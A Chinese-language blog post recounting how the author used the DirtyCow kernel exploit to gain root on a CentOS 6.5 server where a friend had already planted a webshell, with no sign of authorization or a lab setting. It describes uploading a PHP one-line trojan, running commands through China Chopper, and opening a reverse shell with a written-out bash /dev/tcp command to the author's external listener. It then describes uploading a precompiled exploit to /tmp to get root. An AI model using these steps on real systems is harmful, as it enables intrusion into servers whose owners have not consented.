DirtyCow(脏牛)漏洞之实战

1. 前言

这篇文章是小伙伴拿下了webshell，但因为是Linux服务器，一直提不了权，于是叫我看看。我通过DirtyCow(脏牛)漏洞拿到了管理员权限，由于是第一次接触DirtyCow(脏牛)漏洞，所以记录下了这篇文章。

2. webshell执行命令

• 首先通过已有的大马webshell执行命令，发现执行失败

  

• 写个一句话木马进去，再尝试用菜刀执行命令

  

• 可以看到菜刀也不能执行命令，但是菜刀返回了服务器的内核版本和系统位数，搜索了一下，应该是centos6.5，本地搭建centos6.5显示的信息也证明了这一点

  

• 搜索了菜刀不能执行命令，根据资料构造了一个php文件，通过菜刀上传了上去，发现果然能执行命令，并且系统版本的确是centos6.5

  

• 通过webshell查看当前权限，发现当前权限为www用户的权限，很多命令都不能执行

  

3. 反弹shell

因为脏牛漏洞利用需要一个持续保持连接的shell，所以需要反弹一个shell

• 首先在自己的外网服务器用nc监听6666端口

  

• 然后在webshell上执行反弹shell命令

  

1

$ bash -i >& /dev/tcp/x.x.x.x/6666 0>&1         # 其中x.x.x.x是自己nc监听的服务器地址

• 执行命令之后，外网服务器获得一个shell

  

4. 提权

有了稳定的shell之后，就可以开始尝试提权了，这里提权的exp建议在本地编译，因为目标机上www权限可能没权限执行gcc命令或者没有安装gcc

• 本地编译测试

  

• 上传到目标机器上提权(需要上传到/tmp/目录下，因为/tmp/目录下有执行权限)

  

• 提权成功后，通过firefart账户登录，然后查看权限可看到是root权限

  

5. END

该篇文章没啥技术含量，就是拿人家的exp上去跑了一遍就提权成功了，相当于脚本小子了，所以严格来说这只是篇经历文章。有时间应该去分析下脏牛漏洞的漏洞成因，以后再说吧。